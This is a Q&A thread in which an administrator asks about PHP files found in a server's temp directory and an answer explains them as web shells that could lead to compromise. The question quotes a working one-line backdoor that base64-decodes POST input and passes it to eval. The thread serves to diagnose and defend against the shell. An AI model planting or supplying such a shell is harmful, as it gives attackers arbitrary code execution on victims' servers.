PHP code contained in phpXXXX.tmp files in temp directory

Question

I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp

Looking into the contents I find a number followed by some PHP code, the following code appears in several files

9990000    
<?php 
    $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.

Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?

I don't know if it is relevant but we are running PHP 5.5 on IIS

Answer 1

Short story: your server may have already been compromised.

Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.

The key parts to understanding the shell are:

$xsser=base64_decode($_POST['z0']);
@eval("\$safedg = $xsser;");

It accepts any code at all from a $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.

It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.

So what to do about it? Check your server logs - if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site, and lock them down (require user authentication, etc.), and then if you're certain that you're compromised, don't bother trying to clean it. Spin up a new server, migrate your clean code, important files, and data to the clean server.